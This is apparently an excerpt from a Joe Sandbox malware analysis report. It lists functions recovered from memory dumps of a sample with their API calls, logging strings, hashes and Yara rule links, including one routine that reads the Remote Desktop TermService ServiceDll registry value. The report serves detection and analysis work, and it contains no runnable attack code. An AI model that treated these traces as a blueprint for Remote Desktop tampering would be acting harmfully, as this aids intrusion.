String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
Instruction ID: b6ca3425774f9f4edb75aa4240e7ca6d9b1a92dbeb84f8df90d30d0f2c7afb2d
Opcode Fuzzy Hash: 204197e28d0218e5bb9a1a286745401afee39e57a0e3aa4e79a336b4d32a1a88
Instruction Fuzzy Hash: 67F0A4D1F1A74752FA719F49A8006B563A1AF44BD0F488131DDDD4B7B8EF2CE6868B00

Function 00007FFE0E16CF13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0E16CF33

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

GetLastError.KERNEL32 ref: 00007FFE0E16CF66

Strings

module_get_proc, xrefs: 00007FFE0E16CF4C, 00007FFE0E16CF76
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0E16CF53
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0E16CF7D

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
Instruction ID: 3022929cc10eee8fff162a51c0703f62061bd30e82b1bd1b3675752226b42656
Opcode Fuzzy Hash: c197a9657db9c7da096505ab386be7bd724489283de748c128f0a002c1b1a445
Instruction Fuzzy Hash: 9EF0A990B0A65751FA514756E9001F9A321AF48FC0F554533ECDD4B779EF2CDA4A8300

Function 00007FFE11EC20F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11EC2113

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

GetLastError.KERNEL32 ref: 00007FFE11EC2146

Strings

module_get_proc, xrefs: 00007FFE11EC212C, 00007FFE11EC2156
[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11EC215D
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11EC2133

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 65fa061a218c026dd9945c36cd5a0c410748d6b7fb06b96f136c5ff433fb326e
Instruction ID: 8efe812b46552224a1358ee3f90f9d0430c9e22d13bfb09b46ec7241c6384720
Opcode Fuzzy Hash: 65fa061a218c026dd9945c36cd5a0c410748d6b7fb06b96f136c5ff433fb326e
Instruction Fuzzy Hash: 3DF08150A0DE5782FF118B87EC002AB52696F44FF4F485171DD5C0B7B9EE2CE5968300

Function 00007FFE11509FF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE1150A002

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE1150A02E

Strings

[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE1150A01D
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE1150A041
module_load, xrefs: 00007FFE1150A016, 00007FFE1150A03A

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 7410152268ada712884bd5148c559befc1376da73c8ea4b72d111df4c4faeaca
Instruction ID: a637cad27951fa8d322440910df6cd8c41515e9ec171a1d6ba04d17fe42b4db2
Opcode Fuzzy Hash: 7410152268ada712884bd5148c559befc1376da73c8ea4b72d111df4c4faeaca
Instruction Fuzzy Hash: 7CF05E54E4AE07A0EF12A7BFA8504B82299AF15BA0F4855B5CC0E56375FD1CE986C310

Function 00007FFE0EB41AA4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0EB41AB2

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

GetLastError.KERNEL32 ref: 00007FFE0EB41ADE

Strings

module_load, xrefs: 00007FFE0EB41AC6, 00007FFE0EB41AEA
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0EB41AF1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0EB41ACD

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
Instruction ID: fc2fc5445f7da2e2dace002e293ebd0084e4ba1f189d9783a6a7b632a76b8774
Opcode Fuzzy Hash: 0816c4c5aace0ee0c92104ebcd679995e601e5eb34cc43c6fa76a6c60365b11d
Instruction Fuzzy Hash: 28F05891F0AB4B50F9B59F5EE8505B023A0EF04B84F884531CD8C5B779FE2CA5868B00

Function 00007FFE0E16CF94 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE0E16CFA2

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

GetLastError.KERNEL32 ref: 00007FFE0E16CFCE

Strings

module_load, xrefs: 00007FFE0E16CFB6, 00007FFE0E16CFDA
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE0E16CFE1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE0E16CFBD

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
Instruction ID: f5871e40deb10dbc477549004d6c6ae5c4c4a0c635c2cb6dea56ed053009dee0
Opcode Fuzzy Hash: 646d57b541b335a283eea89aabbd0e98fb64b2e9af168f0a9fdd3a4f1d6bc300
Instruction Fuzzy Hash: 79F08260F0FA1750FE529B5AA8405F423606F88FC0F595873DCCD57B76ED1CA5898340

Function 00007FFE11EC2174 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FFE11EC2182

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

GetLastError.KERNEL32 ref: 00007FFE11EC21AE

Strings

[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FFE11EC21C1
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FFE11EC219D
module_load, xrefs: 00007FFE11EC2196, 00007FFE11EC21BA

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
API String ID: 4085810780-3386190286
Opcode ID: 9b3eac2299f60b86e3d521002da07dc2f4d4a994ecdc1d0da0b6fd7200d9ea68
Instruction ID: cc50d90efd9392bb23ab6cb7ad5f039f674ff3c5a8710816e69a49e2b8511d3c
Opcode Fuzzy Hash: 9b3eac2299f60b86e3d521002da07dc2f4d4a994ecdc1d0da0b6fd7200d9ea68
Instruction Fuzzy Hash: 58F05E14E0AE5785FF519BD7AC446F612585F58BB0F8824B1CD0C26371ED2CB5868300

Function 00007FFE0EB45AC0 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 50stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE0EB42472: RegOpenKeyExA.ADVAPI32 ref: 00007FFE0EB424CC

strlen.MSVCRT ref: 00007FFE0EB45B12
strcmp.MSVCRT ref: 00007FFE0EB45B6A

Strings

termsrv.dll, xrefs: 00007FFE0EB45B63
SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 00007FFE0EB45AF0
ServiceDll, xrefs: 00007FFE0EB45AE9

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Openstrcmpstrlen
String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll$termsrv.dll
API String ID: 679246061-1413152910
Opcode ID: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
Instruction ID: a571f353aa3f2f5e48ea19dbf935d93756a9b9001fc3d9056103a16012d1f6a3
Opcode Fuzzy Hash: fcf01618166d6772e81f11eb3996559ca3f77ef975368beb83bea753555944a6
Instruction Fuzzy Hash: BF212CA2A1DB8792EA319F10A8913FA6354EB50315F800032E6DE465B5DF2CD649CA40

Function 00007FFE11502209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE1150222F
WSAGetLastError.WS2_32 ref: 00007FFE1150224D

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11502264
sock_set_blocking, xrefs: 00007FFE1150225D

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 007b94f043fb3cde79ec489f0ad8a0c70b5437ab3b484004fe57740600d97eec
Instruction ID: 67e554846ef788815c89a761960aa54797282978f3c38b6fddfe689e2af91efe
Opcode Fuzzy Hash: 007b94f043fb3cde79ec489f0ad8a0c70b5437ab3b484004fe57740600d97eec
Instruction Fuzzy Hash: B9F0F6A1F0CA1396F71157EBA8401BD6269EB947B4F148276EC2E833B4DE3CE9468701

Function 00007FFE0EB44D89 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0EB44DAF
WSAGetLastError.WS2_32 ref: 00007FFE0EB44DCD

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44DE4
sock_set_blocking, xrefs: 00007FFE0EB44DDD

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
Instruction ID: b863847fb005974a83a2e0bffbd140d00f9f0b9058f3cc7cfceae45471eb5ec5
Opcode Fuzzy Hash: 491ca2efa7c855bf823389286f95842b7971bdf9ad15312334074ab60ee9df2f
Instruction Fuzzy Hash: 31F068A1F0C64356F3345F69A8002B65660EB94754F148235DCAE937B4DE7C98568F01

Function 00007FFE0E162209 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE0E16222F
WSAGetLastError.WS2_32 ref: 00007FFE0E16224D

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E162264
sock_set_blocking, xrefs: 00007FFE0E16225D

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
Instruction ID: ccf33a5c32118901ec496bd670a40ee1e6eabfcbd21bca98c2352e6775a8bb95
Opcode Fuzzy Hash: 3e4103bee5abb71778d63ab542923b9989150a137cd39017df41709a0e9334bd
Instruction Fuzzy Hash: 16F09671F0D64386F7105769B8401B55260EF94794F108237EDAE837B5DE3CD94AC701

Function 00007FFE11EC2349 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 33networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFE11EC236F
WSAGetLastError.WS2_32 ref: 00007FFE11EC238D

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

sock_set_blocking, xrefs: 00007FFE11EC239D
[E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11EC23A4

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastfflushfwriteioctlsocket
String ID: [E] (%s) -> ioctlsocket(FIONBIO) failed(sock=0x%llx,value=%d,WSAgle=%d)$sock_set_blocking
API String ID: 325303940-110789774
Opcode ID: dd9153f1ae20d15b24664b26d27a0e3f3d19c0b133190d0fe7bda50892638261
Instruction ID: d299995ef46911e125d10dec847d5653b4765e18f6a8b544e25719f9bd4c7150
Opcode Fuzzy Hash: dd9153f1ae20d15b24664b26d27a0e3f3d19c0b133190d0fe7bda50892638261
Instruction Fuzzy Hash: 62F09661F0CA5386FB105BABAC002BB5168AB947B4F545172EC2D877B4DE3CE8468700

Function 00007FFE1150233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE1150236A
WSAGetLastError.WS2_32 ref: 00007FFE11502381

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE11502398
tcp_set_nodelay, xrefs: 00007FFE11502391

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 5f9220f8437169eb67f67e5f2495073c1b6f29ca8b8ca016f008a35058367dca
Instruction ID: 65eb02450573b341aba7fa1d7f4fbce8f5172f94f8e01aaae4ffcb9a732203e0
Opcode Fuzzy Hash: 5f9220f8437169eb67f67e5f2495073c1b6f29ca8b8ca016f008a35058367dca
Instruction Fuzzy Hash: 55F02BB1B0C90296F3105B6BB8405B96665BB947B4F008275ED5D837B8DF3CD54BC700

Function 00007FFE0EB44EBA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0EB44EEA
WSAGetLastError.WS2_32 ref: 00007FFE0EB44F01

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0EB44F18
tcp_set_nodelay, xrefs: 00007FFE0EB44F11

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
Instruction ID: 0c50c3a0fcaea9f8db117fbf5e5b6d31f947e0e6e55d26d532de15909191020d
Opcode Fuzzy Hash: f73191922408c38ddcde4302cf36f1d3d11bbd068eba9f1f2a5320039dc8a134
Instruction Fuzzy Hash: 5AF096B2B186425AF3205F19B8006A56660EB88764F108231EDAD83BF4DF7DD945CF00

Function 00007FFE0E16233A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32networkCOMMON

Download Yara Rule

APIs

setsockopt.WS2_32 ref: 00007FFE0E16236A
WSAGetLastError.WS2_32 ref: 00007FFE0E162381

Strings

[E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d), xrefs: 00007FFE0E162398
tcp_set_nodelay, xrefs: 00007FFE0E162391

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLastsetsockopt
String ID: [E] (%s) -> setsockopt(TCP_NODELAY) failed(sock=0x%llx,value=%d,WSAgle=%d)$tcp_set_nodelay
API String ID: 1729277954-3534120083
Opcode ID: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
Instruction ID: 5a29a860c574cdaccfa7e62a096f580d5dbb35840b9e4c6de897eab532d3ee32
Opcode Fuzzy Hash: 6f2b0580ac5e605570fbaebc72f07140d3916ffc578ac77e8f5814e9907ee8f3
Instruction Fuzzy Hash: 7BF09671B085478AF3505B6AB8005B66661AB887A4F108237EDED837B5DF7CD589C700

